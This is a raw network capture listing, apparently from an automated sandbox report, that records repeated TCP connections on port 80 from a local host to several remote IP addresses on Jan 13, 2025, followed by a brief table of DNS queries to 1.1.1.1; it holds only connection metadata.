                                                    Jan 13, 2025 09:34:54.899080038 CET4999380192.168.2.6188.114.96.3
                                                    Jan 13, 2025 09:34:54.903907061 CET8049993188.114.96.3192.168.2.6
                                                    Jan 13, 2025 09:34:55.999488115 CET8049993188.114.96.3192.168.2.6
                                                    Jan 13, 2025 09:34:55.999533892 CET8049993188.114.96.3192.168.2.6
                                                    Jan 13, 2025 09:34:55.999758005 CET4999380192.168.2.6188.114.96.3
                                                    Jan 13, 2025 09:34:56.000134945 CET8049993188.114.96.3192.168.2.6
                                                    Jan 13, 2025 09:34:56.000201941 CET4999380192.168.2.6188.114.96.3
                                                    Jan 13, 2025 09:34:56.409543991 CET4999380192.168.2.6188.114.96.3
                                                    Jan 13, 2025 09:34:57.430490971 CET4999480192.168.2.6188.114.96.3
                                                    Jan 13, 2025 09:34:58.437393904 CET4999480192.168.2.6188.114.96.3
                                                    Jan 13, 2025 09:34:58.454576015 CET8049994188.114.96.3192.168.2.6
                                                    Jan 13, 2025 09:34:58.454622984 CET8049994188.114.96.3192.168.2.6
                                                    Jan 13, 2025 09:34:58.454730034 CET4999480192.168.2.6188.114.96.3
                                                    Jan 13, 2025 09:34:58.454760075 CET4999480192.168.2.6188.114.96.3
                                                    Jan 13, 2025 09:34:58.471421957 CET4999480192.168.2.6188.114.96.3
                                                    Jan 13, 2025 09:34:58.476391077 CET8049994188.114.96.3192.168.2.6
                                                    Jan 13, 2025 09:34:58.476458073 CET8049994188.114.96.3192.168.2.6
                                                    Jan 13, 2025 09:34:59.627232075 CET8049994188.114.96.3192.168.2.6
                                                    Jan 13, 2025 09:34:59.627259970 CET8049994188.114.96.3192.168.2.6
                                                    Jan 13, 2025 09:34:59.627388000 CET4999480192.168.2.6188.114.96.3
                                                    Jan 13, 2025 09:34:59.627757072 CET8049994188.114.96.3192.168.2.6
                                                    Jan 13, 2025 09:34:59.627813101 CET4999480192.168.2.6188.114.96.3
                                                    Jan 13, 2025 09:34:59.984396935 CET4999480192.168.2.6188.114.96.3
                                                    Jan 13, 2025 09:35:01.004471064 CET4999680192.168.2.6188.114.96.3
                                                    Jan 13, 2025 09:35:01.009522915 CET8049996188.114.96.3192.168.2.6
                                                    Jan 13, 2025 09:35:01.009664059 CET4999680192.168.2.6188.114.96.3
                                                    Jan 13, 2025 09:35:01.020791054 CET4999680192.168.2.6188.114.96.3
                                                    Jan 13, 2025 09:35:01.025648117 CET8049996188.114.96.3192.168.2.6
                                                    Jan 13, 2025 09:35:02.157812119 CET8049996188.114.96.3192.168.2.6
                                                    Jan 13, 2025 09:35:02.157833099 CET8049996188.114.96.3192.168.2.6
                                                    Jan 13, 2025 09:35:02.157847881 CET8049996188.114.96.3192.168.2.6
                                                    Jan 13, 2025 09:35:02.158009052 CET4999680192.168.2.6188.114.96.3
                                                    Jan 13, 2025 09:35:02.161855936 CET4999680192.168.2.6188.114.96.3
                                                    Jan 13, 2025 09:35:02.166690111 CET8049996188.114.96.3192.168.2.6
                                                    Jan 13, 2025 09:35:07.355765104 CET4999780192.168.2.647.83.1.90
                                                    Jan 13, 2025 09:35:07.360676050 CET804999747.83.1.90192.168.2.6
                                                    Jan 13, 2025 09:35:07.360821962 CET4999780192.168.2.647.83.1.90
                                                    Jan 13, 2025 09:35:07.382155895 CET4999780192.168.2.647.83.1.90
                                                    Jan 13, 2025 09:35:07.387068987 CET804999747.83.1.90192.168.2.6
                                                    Jan 13, 2025 09:35:08.890662909 CET4999780192.168.2.647.83.1.90
                                                    Jan 13, 2025 09:35:08.900254011 CET804999747.83.1.90192.168.2.6
                                                    Jan 13, 2025 09:35:08.900367975 CET4999780192.168.2.647.83.1.90
                                                    Jan 13, 2025 09:35:09.910701036 CET4999880192.168.2.647.83.1.90
                                                    Jan 13, 2025 09:35:09.915558100 CET804999847.83.1.90192.168.2.6
                                                    Jan 13, 2025 09:35:09.915709972 CET4999880192.168.2.647.83.1.90
                                                    Jan 13, 2025 09:35:09.932131052 CET4999880192.168.2.647.83.1.90
                                                    Jan 13, 2025 09:35:09.936976910 CET804999847.83.1.90192.168.2.6
                                                    Jan 13, 2025 09:35:11.437644005 CET4999880192.168.2.647.83.1.90
                                                    Jan 13, 2025 09:35:11.442627907 CET804999847.83.1.90192.168.2.6
                                                    Jan 13, 2025 09:35:11.443340063 CET4999880192.168.2.647.83.1.90
                                                    Jan 13, 2025 09:35:12.456332922 CET4999980192.168.2.647.83.1.90
                                                    Jan 13, 2025 09:35:12.461230993 CET804999947.83.1.90192.168.2.6
                                                    Jan 13, 2025 09:35:12.461345911 CET4999980192.168.2.647.83.1.90
                                                    Jan 13, 2025 09:35:12.475527048 CET4999980192.168.2.647.83.1.90
                                                    Jan 13, 2025 09:35:12.480453014 CET804999947.83.1.90192.168.2.6
                                                    Jan 13, 2025 09:35:12.480475903 CET804999947.83.1.90192.168.2.6
                                                    Jan 13, 2025 09:35:13.984667063 CET4999980192.168.2.647.83.1.90
                                                    Jan 13, 2025 09:35:13.989829063 CET804999947.83.1.90192.168.2.6
                                                    Jan 13, 2025 09:35:13.989926100 CET4999980192.168.2.647.83.1.90
                                                    Jan 13, 2025 09:35:15.004407883 CET5000080192.168.2.647.83.1.90
                                                    Jan 13, 2025 09:35:15.010694027 CET805000047.83.1.90192.168.2.6
                                                    Jan 13, 2025 09:35:15.010771990 CET5000080192.168.2.647.83.1.90
                                                    Jan 13, 2025 09:35:15.023931026 CET5000080192.168.2.647.83.1.90
                                                    Jan 13, 2025 09:35:15.029650927 CET805000047.83.1.90192.168.2.6
                                                    Jan 13, 2025 09:35:16.629235029 CET805000047.83.1.90192.168.2.6
                                                    Jan 13, 2025 09:35:16.629261971 CET805000047.83.1.90192.168.2.6
                                                    Jan 13, 2025 09:35:16.629411936 CET5000080192.168.2.647.83.1.90
                                                    Jan 13, 2025 09:35:16.631953001 CET5000080192.168.2.647.83.1.90
                                                    Jan 13, 2025 09:35:16.636750937 CET805000047.83.1.90192.168.2.6
                                                    Jan 13, 2025 09:35:37.787398100 CET5000280192.168.2.6162.0.236.169
                                                    Jan 13, 2025 09:35:37.792373896 CET8050002162.0.236.169192.168.2.6
                                                    Jan 13, 2025 09:35:37.792481899 CET5000280192.168.2.6162.0.236.169
                                                    Jan 13, 2025 09:35:37.807696104 CET5000280192.168.2.6162.0.236.169
                                                    Jan 13, 2025 09:35:37.812616110 CET8050002162.0.236.169192.168.2.6
                                                    Jan 13, 2025 09:35:38.388261080 CET8050002162.0.236.169192.168.2.6
                                                    Jan 13, 2025 09:35:38.388326883 CET8050002162.0.236.169192.168.2.6
                                                    Jan 13, 2025 09:35:38.388391018 CET5000280192.168.2.6162.0.236.169
                                                    Jan 13, 2025 09:35:39.312315941 CET5000280192.168.2.6162.0.236.169
                                                    Jan 13, 2025 09:35:40.331525087 CET5000380192.168.2.6162.0.236.169
                                                    Jan 13, 2025 09:35:40.360564947 CET8050003162.0.236.169192.168.2.6
                                                    Jan 13, 2025 09:35:40.360732079 CET5000380192.168.2.6162.0.236.169
                                                    Jan 13, 2025 09:35:40.375359058 CET5000380192.168.2.6162.0.236.169
                                                    Jan 13, 2025 09:35:40.380204916 CET8050003162.0.236.169192.168.2.6
                                                    Jan 13, 2025 09:35:40.969507933 CET8050003162.0.236.169192.168.2.6
                                                    Jan 13, 2025 09:35:40.969541073 CET8050003162.0.236.169192.168.2.6
                                                    Jan 13, 2025 09:35:40.969633102 CET5000380192.168.2.6162.0.236.169
                                                    Jan 13, 2025 09:35:41.892401934 CET5000380192.168.2.6162.0.236.169
                                                    Jan 13, 2025 09:35:42.909390926 CET5000480192.168.2.6162.0.236.169
                                                    Jan 13, 2025 09:35:42.914371967 CET8050004162.0.236.169192.168.2.6
                                                    Jan 13, 2025 09:35:42.914485931 CET5000480192.168.2.6162.0.236.169
                                                    Jan 13, 2025 09:35:42.926531076 CET5000480192.168.2.6162.0.236.169
                                                    Jan 13, 2025 09:35:42.931396008 CET8050004162.0.236.169192.168.2.6
                                                    Jan 13, 2025 09:35:42.931525946 CET8050004162.0.236.169192.168.2.6
                                                    Jan 13, 2025 09:35:43.514452934 CET8050004162.0.236.169192.168.2.6
                                                    Jan 13, 2025 09:35:43.514668941 CET8050004162.0.236.169192.168.2.6
                                                    Jan 13, 2025 09:35:43.514733076 CET5000480192.168.2.6162.0.236.169
                                                    Jan 13, 2025 09:35:44.437402964 CET5000480192.168.2.6162.0.236.169
                                                    Jan 13, 2025 09:35:45.456078053 CET5000580192.168.2.6162.0.236.169
                                                    Jan 13, 2025 09:35:45.539423943 CET8050005162.0.236.169192.168.2.6
                                                    Jan 13, 2025 09:35:45.539681911 CET5000580192.168.2.6162.0.236.169
                                                    Jan 13, 2025 09:35:45.548999071 CET5000580192.168.2.6162.0.236.169
                                                    Jan 13, 2025 09:35:45.553847075 CET8050005162.0.236.169192.168.2.6
                                                    Jan 13, 2025 09:35:46.127190113 CET8050005162.0.236.169192.168.2.6
                                                    Jan 13, 2025 09:35:46.127326965 CET8050005162.0.236.169192.168.2.6
                                                    Jan 13, 2025 09:35:46.127444029 CET5000580192.168.2.6162.0.236.169
                                                    Jan 13, 2025 09:35:46.130130053 CET5000580192.168.2.6162.0.236.169
                                                    Jan 13, 2025 09:35:46.134906054 CET8050005162.0.236.169192.168.2.6
                                                    Jan 13, 2025 09:35:51.496648073 CET5000680192.168.2.6192.186.58.31
                                                    Jan 13, 2025 09:35:51.501511097 CET8050006192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:35:51.501641035 CET5000680192.168.2.6192.186.58.31
                                                    Jan 13, 2025 09:35:51.520896912 CET5000680192.168.2.6192.186.58.31
                                                    Jan 13, 2025 09:35:51.525835991 CET8050006192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:35:52.389759064 CET8050006192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:35:52.389784098 CET8050006192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:35:52.390024900 CET5000680192.168.2.6192.186.58.31
                                                    Jan 13, 2025 09:35:53.031141996 CET5000680192.168.2.6192.186.58.31
                                                    Jan 13, 2025 09:35:54.050096035 CET5000780192.168.2.6192.186.58.31
                                                    Jan 13, 2025 09:35:54.054980040 CET8050007192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:35:54.055087090 CET5000780192.168.2.6192.186.58.31
                                                    Jan 13, 2025 09:35:54.070956945 CET5000780192.168.2.6192.186.58.31
                                                    Jan 13, 2025 09:35:54.075766087 CET8050007192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:35:54.999159098 CET8050007192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:35:54.999265909 CET8050007192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:35:54.999329090 CET5000780192.168.2.6192.186.58.31
                                                    Jan 13, 2025 09:35:55.577883005 CET5000780192.168.2.6192.186.58.31
                                                    Jan 13, 2025 09:35:56.596518993 CET5000880192.168.2.6192.186.58.31
                                                    Jan 13, 2025 09:35:56.601629019 CET8050008192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:35:56.601757050 CET5000880192.168.2.6192.186.58.31
                                                    Jan 13, 2025 09:35:56.616311073 CET5000880192.168.2.6192.186.58.31
                                                    Jan 13, 2025 09:35:56.621180058 CET8050008192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:35:56.621263981 CET8050008192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:35:57.536473989 CET8050008192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:35:57.536525011 CET8050008192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:35:57.536618948 CET5000880192.168.2.6192.186.58.31
                                                    Jan 13, 2025 09:35:58.124887943 CET5000880192.168.2.6192.186.58.31
                                                    Jan 13, 2025 09:35:59.143754959 CET5000980192.168.2.6192.186.58.31
                                                    Jan 13, 2025 09:35:59.148749113 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:35:59.148847103 CET5000980192.168.2.6192.186.58.31
                                                    Jan 13, 2025 09:35:59.157665014 CET5000980192.168.2.6192.186.58.31
                                                    Jan 13, 2025 09:35:59.162491083 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.141891956 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.141910076 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.141926050 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.141948938 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.141964912 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.141979933 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.141993046 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.142008066 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.142014027 CET5000980192.168.2.6192.186.58.31
                                                    Jan 13, 2025 09:36:00.142024040 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.142039061 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.142124891 CET5000980192.168.2.6192.186.58.31
                                                    Jan 13, 2025 09:36:00.142158985 CET5000980192.168.2.6192.186.58.31
                                                    Jan 13, 2025 09:36:00.146886110 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.146902084 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.146917105 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.146982908 CET5000980192.168.2.6192.186.58.31
                                                    Jan 13, 2025 09:36:00.187199116 CET5000980192.168.2.6192.186.58.31
                                                    Jan 13, 2025 09:36:00.346566916 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.346587896 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.346616030 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.346628904 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.346756935 CET5000980192.168.2.6192.186.58.31
                                                    Jan 13, 2025 09:36:00.346770048 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.346802950 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.346834898 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.346854925 CET5000980192.168.2.6192.186.58.31
                                                    Jan 13, 2025 09:36:00.347183943 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.347210884 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.347224951 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.347240925 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.347255945 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.347299099 CET5000980192.168.2.6192.186.58.31
                                                    Jan 13, 2025 09:36:00.347353935 CET5000980192.168.2.6192.186.58.31
                                                    Jan 13, 2025 09:36:00.347353935 CET5000980192.168.2.6192.186.58.31
                                                    Jan 13, 2025 09:36:00.348058939 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.348081112 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.348097086 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.348110914 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.348134041 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.348149061 CET5000980192.168.2.6192.186.58.31
                                                    Jan 13, 2025 09:36:00.348176003 CET5000980192.168.2.6192.186.58.31
                                                    Jan 13, 2025 09:36:00.349004030 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.349019051 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.349034071 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.349047899 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.349062920 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.349066019 CET5000980192.168.2.6192.186.58.31
                                                    Jan 13, 2025 09:36:00.349112988 CET5000980192.168.2.6192.186.58.31
                                                    Jan 13, 2025 09:36:00.349143028 CET5000980192.168.2.6192.186.58.31
                                                    Jan 13, 2025 09:36:00.349756956 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.351797104 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.351816893 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.351828098 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.352013111 CET5000980192.168.2.6192.186.58.31
                                                    Jan 13, 2025 09:36:00.551589012 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.551687956 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.551712036 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.551728010 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.551740885 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.551757097 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.551772118 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.551799059 CET5000980192.168.2.6192.186.58.31
                                                    Jan 13, 2025 09:36:00.551799059 CET5000980192.168.2.6192.186.58.31
                                                    Jan 13, 2025 09:36:00.551847935 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.551862955 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.551879883 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.551903963 CET5000980192.168.2.6192.186.58.31
                                                    Jan 13, 2025 09:36:00.551904917 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.551903963 CET5000980192.168.2.6192.186.58.31
                                                    Jan 13, 2025 09:36:00.551925898 CET5000980192.168.2.6192.186.58.31
                                                    Jan 13, 2025 09:36:00.551927090 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.551980972 CET5000980192.168.2.6192.186.58.31
                                                    Jan 13, 2025 09:36:00.552196980 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.552309990 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.552330017 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.552346945 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.552360058 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.552376032 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.552372932 CET5000980192.168.2.6192.186.58.31
                                                    Jan 13, 2025 09:36:00.552388906 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.552393913 CET5000980192.168.2.6192.186.58.31
                                                    Jan 13, 2025 09:36:00.552402973 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.552412033 CET5000980192.168.2.6192.186.58.31
                                                    Jan 13, 2025 09:36:00.552452087 CET5000980192.168.2.6192.186.58.31
                                                    Jan 13, 2025 09:36:00.552851915 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.552877903 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.552895069 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.552908897 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.552922964 CET5000980192.168.2.6192.186.58.31
                                                    Jan 13, 2025 09:36:00.552923918 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.552938938 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.552947998 CET5000980192.168.2.6192.186.58.31
                                                    Jan 13, 2025 09:36:00.552953959 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.552969933 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.552985907 CET5000980192.168.2.6192.186.58.31
                                                    Jan 13, 2025 09:36:00.553023100 CET5000980192.168.2.6192.186.58.31
                                                    Jan 13, 2025 09:36:00.553473949 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.553497076 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.553513050 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.553534031 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.553544998 CET5000980192.168.2.6192.186.58.31
                                                    Jan 13, 2025 09:36:00.553549051 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.553561926 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.553582907 CET5000980192.168.2.6192.186.58.31
                                                    Jan 13, 2025 09:36:00.553585052 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.553599119 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.553613901 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.553620100 CET5000980192.168.2.6192.186.58.31
                                                    Jan 13, 2025 09:36:00.553627014 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.553642988 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.553646088 CET5000980192.168.2.6192.186.58.31
                                                    Jan 13, 2025 09:36:00.553658009 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.553667068 CET5000980192.168.2.6192.186.58.31
                                                    Jan 13, 2025 09:36:00.553706884 CET5000980192.168.2.6192.186.58.31
                                                    Jan 13, 2025 09:36:00.554455042 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.554470062 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.554485083 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.554527998 CET5000980192.168.2.6192.186.58.31
                                                    Jan 13, 2025 09:36:00.554529905 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.554546118 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.554559946 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.554574966 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.554574966 CET5000980192.168.2.6192.186.58.31
                                                    Jan 13, 2025 09:36:00.554589987 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.554600954 CET5000980192.168.2.6192.186.58.31
                                                    Jan 13, 2025 09:36:00.554605007 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.554641008 CET5000980192.168.2.6192.186.58.31
                                                    Jan 13, 2025 09:36:00.609150887 CET5000980192.168.2.6192.186.58.31
                                                    Jan 13, 2025 09:36:00.756680965 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.756716013 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.756731987 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.756747007 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.756767988 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.756783009 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.756798029 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.756807089 CET5000980192.168.2.6192.186.58.31
                                                    Jan 13, 2025 09:36:00.756813049 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.756828070 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.756841898 CET5000980192.168.2.6192.186.58.31
                                                    Jan 13, 2025 09:36:00.756841898 CET5000980192.168.2.6192.186.58.31
                                                    Jan 13, 2025 09:36:00.756844044 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.756861925 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.756880045 CET5000980192.168.2.6192.186.58.31
                                                    Jan 13, 2025 09:36:00.756953001 CET5000980192.168.2.6192.186.58.31
                                                    Jan 13, 2025 09:36:00.782973051 CET5000980192.168.2.6192.186.58.31
                                                    Jan 13, 2025 09:36:00.787946939 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:06.372971058 CET5001080192.168.2.6104.21.16.1
                                                    Jan 13, 2025 09:36:06.377840042 CET8050010104.21.16.1192.168.2.6
                                                    Jan 13, 2025 09:36:06.377942085 CET5001080192.168.2.6104.21.16.1
                                                    Jan 13, 2025 09:36:06.398170948 CET5001080192.168.2.6104.21.16.1
                                                    Jan 13, 2025 09:36:06.403117895 CET8050010104.21.16.1192.168.2.6
                                                    Jan 13, 2025 09:36:07.298295975 CET8050010104.21.16.1192.168.2.6
                                                    Jan 13, 2025 09:36:07.298460960 CET8050010104.21.16.1192.168.2.6
                                                    Jan 13, 2025 09:36:07.298525095 CET5001080192.168.2.6104.21.16.1
                                                    Jan 13, 2025 09:36:07.905985117 CET5001080192.168.2.6104.21.16.1
                                                    Jan 13, 2025 09:36:08.925714970 CET5001180192.168.2.6104.21.16.1
                                                    Jan 13, 2025 09:36:08.930639029 CET8050011104.21.16.1192.168.2.6
                                                    Jan 13, 2025 09:36:08.930712938 CET5001180192.168.2.6104.21.16.1
                                                    Jan 13, 2025 09:36:08.946518898 CET5001180192.168.2.6104.21.16.1
                                                    Jan 13, 2025 09:36:08.952204943 CET8050011104.21.16.1192.168.2.6
                                                    Jan 13, 2025 09:36:09.838385105 CET8050011104.21.16.1192.168.2.6
                                                    Jan 13, 2025 09:36:09.839632988 CET8050011104.21.16.1192.168.2.6
                                                    Jan 13, 2025 09:36:09.839688063 CET5001180192.168.2.6104.21.16.1
                                                    Jan 13, 2025 09:36:10.452967882 CET5001180192.168.2.6104.21.16.1
                                                    Jan 13, 2025 09:36:11.471441984 CET5001280192.168.2.6104.21.16.1
                                                    Jan 13, 2025 09:36:11.476403952 CET8050012104.21.16.1192.168.2.6
                                                    Jan 13, 2025 09:36:11.476511002 CET5001280192.168.2.6104.21.16.1
                                                    Jan 13, 2025 09:36:11.491955042 CET5001280192.168.2.6104.21.16.1
                                                    Jan 13, 2025 09:36:11.496875048 CET8050012104.21.16.1192.168.2.6
                                                    Jan 13, 2025 09:36:11.496907949 CET8050012104.21.16.1192.168.2.6
                                                    Jan 13, 2025 09:36:12.416405916 CET8050012104.21.16.1192.168.2.6
                                                    Jan 13, 2025 09:36:12.416930914 CET8050012104.21.16.1192.168.2.6
                                                    Jan 13, 2025 09:36:12.416985035 CET5001280192.168.2.6104.21.16.1
                                                    Jan 13, 2025 09:36:12.999732018 CET5001280192.168.2.6104.21.16.1
                                                    Jan 13, 2025 09:36:14.018857956 CET5001380192.168.2.6104.21.16.1
                                                    Jan 13, 2025 09:36:14.023833990 CET8050013104.21.16.1192.168.2.6
                                                    Jan 13, 2025 09:36:14.023992062 CET5001380192.168.2.6104.21.16.1
                                                    Jan 13, 2025 09:36:14.033524036 CET5001380192.168.2.6104.21.16.1
                                                    Jan 13, 2025 09:36:14.038305044 CET8050013104.21.16.1192.168.2.6
                                                    Jan 13, 2025 09:36:14.943185091 CET8050013104.21.16.1192.168.2.6
                                                    Jan 13, 2025 09:36:14.943207979 CET8050013104.21.16.1192.168.2.6
                                                    Jan 13, 2025 09:36:14.943423033 CET5001380192.168.2.6104.21.16.1
                                                    Jan 13, 2025 09:36:14.944148064 CET8050013104.21.16.1192.168.2.6
                                                    Jan 13, 2025 09:36:14.944214106 CET5001380192.168.2.6104.21.16.1
                                                    Jan 13, 2025 09:36:14.946010113 CET5001380192.168.2.6104.21.16.1
                                                    Jan 13, 2025 09:36:14.950814009 CET8050013104.21.16.1192.168.2.6

                                                    UDP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Jan 13, 2025 09:34:22.845370054 CET5562753192.168.2.61.1.1.1
                                                    Jan 13, 2025 09:34:23.198744059 CET53556271.1.1.1192.168.2.6
                                                    Jan 13, 2025 09:34:39.156742096 CET5952853192.168.2.61.1.1.1
                                                    Jan 13, 2025 09:34:39.168798923 CET53595281.1.1.1192.168.2.6
                                                    Jan 13, 2025 09:34:52.317348957 CET5965453192.168.2.61.1.1.1
                                                    Jan 13, 2025 09:34:52.328912973 CET53596541.1.1.1192.168.2.6
                                                    Jan 13, 2025 09:35:07.176517010 CET6267853192.168.2.61.1.1.1
                                                    Jan 13, 2025 09:35:07.352412939 CET53626781.1.1.1192.168.2.6
                                                    Jan 13, 2025 09:35:21.644254923 CET6093353192.168.2.61.1.1.1
                                                    Jan 13, 2025 09:35:21.652771950 CET53609331.1.1.1192.168.2.6
                                                    Jan 13, 2025 09:35:29.706964016 CET5159853192.168.2.61.1.1.1
                                                    Jan 13, 2025 09:35:29.715720892 CET53515981.1.1.1192.168.2.6
                                                    Jan 13, 2025 09:35:37.769629002 CET5766453192.168.2.61.1.1.1
                                                    Jan 13, 2025 09:35:37.784902096 CET53576641.1.1.1192.168.2.6
